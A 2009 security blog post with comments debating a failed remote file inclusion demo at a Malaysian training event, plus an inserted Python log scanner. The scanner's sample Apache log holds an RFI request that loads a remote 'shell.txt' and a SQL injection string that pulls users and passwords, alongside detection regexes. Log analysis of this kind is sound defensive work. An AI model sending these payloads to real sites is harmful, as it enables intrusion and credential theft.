Analyst Journal @ 01 Jun 2009 05:25 pm by ayoi

http://www.dailystrength.org/people/110944/photos-videos/item/293887
As usual, Monday is a very bad day for me. Dun ask me why, but perhaps I’m watching/reading too much Garfield and have been influenced by this fat, lazy but adorable cat’s obsession with hating Mondays.
So while doing my usual Monday activities (this of course after reading my emails, especially the ones in the Inbox, as I’ve filtered other emails to their respective mailing list folders, so the ones that arrive in the Inbox are usually meant for me personally :)), one of my friends “buzzed” me via one of the Internet Messenger clients.
—–Snip—–
my_friend: why didn’t you come last night
my_friend: hackathon
soulkipper: I went back to ktn
my_friend: cybercert sucks, their hacking demonstration
my_friend: crazy lame
my_friend: luckily I was at *******
soulkipper: btw I’m not 1337 enough
soulkipper: hahaha
my_friend: no, it’s not about being leet
my_friend: there was this guy (not adli nor mahmud)
my_friend: wanted to show
my_friend: a remote file inclusion attack
my_friend: but
my_friend: haha
my_friend: the global variable in php.ini
my_friend: he forgot
soulkipper: remote file inclusion
soulkipper: oh come on
my_friend: to enable it
soulkipper: that’s old stuff
my_friend: so he tried and tried and it didn’t work
my_friend: haha
—–Snip—–
I do believe that my friend had really good intentions in mentioning those. Perhaps in the future the presenter can show some of the latest trends and techniques, or emphasize the rise of client-side attacks on the net. I also believe that the speakers or presenters had gone through their presentation materials and the live demo steps and methods. Maybe some unexpected condition arose during the presentation, hence the unsuccessful live demo.
If I’m not mistaken, during the 2007 Technical Forum at PWTC, one of the presenters who tried to show a demo on Bluetooth hacking also failed. So this kind of thing may happen to anybody. It happens to me a lot during my training sessions, especially when dealing with my VMWares.. Sigh..
If it was me then;
soulkipper: if it were me, I’d just show structured threat analysis using open source tools
soulkipper: end of story
soulkipper: or else collecting Network based evidence using open source tools
Yeah, I would do a demo on performing structured threat analysis or collecting network-based evidence using open source tools like argus, tcpdump, snort, tcpflow etc..
Hmm, maybe I can use this topic for my next knowledge sharing session, or as we call it here, a “kopitiam session”. Materials? I can collect the network traffic and do the demo on a virtual machine. Eh.. I forgot that currently I’m using the “borrowed” laptop. I dun think running virtual machines on this laptop is a good idea…
Ahh later
p/s: To protect the identity of my friend, I have had to filter some of the communication content between us.
Yeah, sometimes shit happens. But from there it showed a lack of preparation. But once again, give some credit to CyberSecurity Malaysia for their effort in organizing the event. The guys from CyberSecurity Malaysia are very busy with their work, so give them some slack.
Let them all complain all they like. Since complaining is the easiest thing that people can do..
Well, hats off to the presenters though. They have the guts to do those presentations. But then yeah, perhaps nerves or some unforeseen mishaps disrupted the presentation..
Demoing an exploit on an application whose configuration allows an insecure mode is just NOT the way to educate people. A better example would be exploiting coding errors such as lack of input filtering. Developers have control of their code, but most likely not the configuration of web application servers.
What we need is better education of developers, not to show off what attackers can do.
Dear spoonfork,
We showed/demoed how people can abuse RFI/SQL and command injection problems to get people to realize the problems; later on we showed them the real problem, which is the insecure CODE practices. And we asked them to spot and fix the CODE (in handouts). And later on we asked them to study the Apache log to find any pattern of those attacks.
*sighh*. We didn’t bother to get people excited by demoing damn plain and old methods of attacking RFI/SQL/etc.. etc. Hence the training is called “analyzing the intrusion” instead of web hacking. *sighh*.
Dear ‘my_friend’,
Again, the whole class is about doing analysis of RFI attacks. Seriously, what is the fuss about attacking? We’re just trying to show the impact of the bugs. *sighh*. That’s the reason why we showed the demo. And dammit, the CTF thingy is just to get people not so sleepy (who wants to learn analyzing stuff compared to breaking stuff? : ) ) .. *sighh*.
And then again, we never ever claimed ourselves to be damn rockstars in the infosec world and, as always, we have our own weaknesses and learning curve.
And yes, I told everybody that RFI/SQL is freaking old and everybody knows about it (RFI/SQL). But does anyone bother to do any free training on analyzing and fixing the bugs for the public at large? ‘Empty talk’ is always what we do better, dude. :)
Were you really there from the beginning when I started our presentation? If you weren’t there and are still complaining about old attacks on RFI, you’re absolutely talking out of context. We kept telling ppl that this is the “BASIC and OLD attacks. Please google for more advanced RFI/SQL injection stuff”. *sigh*
Dear ayoi,
Since when is collecting/analyzing pcap new stuff.. heheh. Just kidding, dude. We just want people to be able to analyze their own code and their own web server log, spot any pattern of attacks and react to it. :) Yeah, that’s all I guess. We didn’t intend to talk about breaking/hacking stuff at all.
Regards,
y0muds
n00b.
p.s: I apologize in advance if I accidentally offended someone with my comments on ayoi’s blog. :) Sorry.
p.p.s: Sorry ayoi for the long comments. hahaha
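As an added illustration of the log-review exercise y0muds describes (this is not code from the post or from the training), here is a small Python scanner that walks Apache combined-log lines and flags query parameters that look like RFI or SQL injection attempts. The log lines, hostnames and IP addresses are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Constructed sample Apache combined-log lines (not taken from any real server).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jun/2009:09:12:01 +0800] "GET /index.php?page=about HTTP/1.1" 200 1543 "-" "Mozilla/5.0"
192.0.2.20 - - [01/Jun/2009:09:12:07 +0800] "GET /index.php?page=http://203.0.113.5/shell.txt? HTTP/1.1" 200 88 "-" "Mozilla/5.0"
192.0.2.30 - - [01/Jun/2009:09:13:44 +0800] "GET /news.php?id=7%27%20UNION%20SELECT%20user,pass%20FROM%20users-- HTTP/1.1" 500 231 "-" "curl/7.19"
192.0.2.40 - - [01/Jun/2009:09:14:02 +0800] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Fields of the combined log format that the scanner needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Heuristics applied to each URL-decoded query-string value.
RFI_RE = re.compile(r'^(https?|ftp)://', re.I)          # parameter value is a remote URL
SQLI_RE = re.compile(r"('|\")\s*(or|and)\s+\S+\s*=|union\s+select|--\s*$|/\*", re.I)


def classify_value(value):
    """Return 'RFI', 'SQLi' or None for one decoded parameter value."""
    if RFI_RE.search(value):
        return "RFI"
    if SQLI_RE.search(value):
        return "SQLi"
    return None


def scan_apache_log(text):
    """Return (client_ip, parameter_name, attack_class) for every suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; skip rather than crash on junk
        query = urlsplit(m.group("target")).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = unquote_plus(raw)  # decode once more in case the client double-encoded
            kind = classify_value(value)
            if kind:
                findings.append((m.group("ip"), name, kind))
    return findings


if __name__ == "__main__":
    for ip, param, kind in scan_apache_log(SAMPLE_LOG):
        print(f"{kind:5} from {ip} via parameter {param!r}")
```

The heuristics are deliberately narrow; a real review would also look at response sizes and status codes for the flagged requests, which the regex matches alone do not give you.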
http://www.8dou.net/html/article_show_30715.shtml
lee, any translation for that website? hehe I’m totally lost trying to understand any words on the website, hehehe.
yomuds,
chill bro chill! hehe
RFI is freaking old? How about weak passwords?
x1337
I think weak passwords are usually a concern of human error/problems. And for this layer, I believe it should be governed by security policies.
But then there’s no patch for human stupidity, right?
With regards to weak passwords:
In the enterprise: domain controllers and PAM are capable of enforcing the usage of strong passwords enterprise-wide.
Application: it’s entirely up to the developer. When was the last time maybank2u asked its users to change their password?
Users are hard to educate, but with the right enforcement, education and the correct usage and deployment of the right technology, a lot of problems can be solved.
Cool, everyone… nobody is perfect in this world. Everybody makes mistakes. The important thing is that we learn from that. And please, keep supporting others too.
akram, here is the translation of the website.. Google is always your best friend..
http://translate.google.com/translate?js=n&prev=_t&hl=en&ie=UTF-8&u=http://www.8dou.net/html/article_show_30715.shtml&sl=zh-CN&tl=en&history_state0=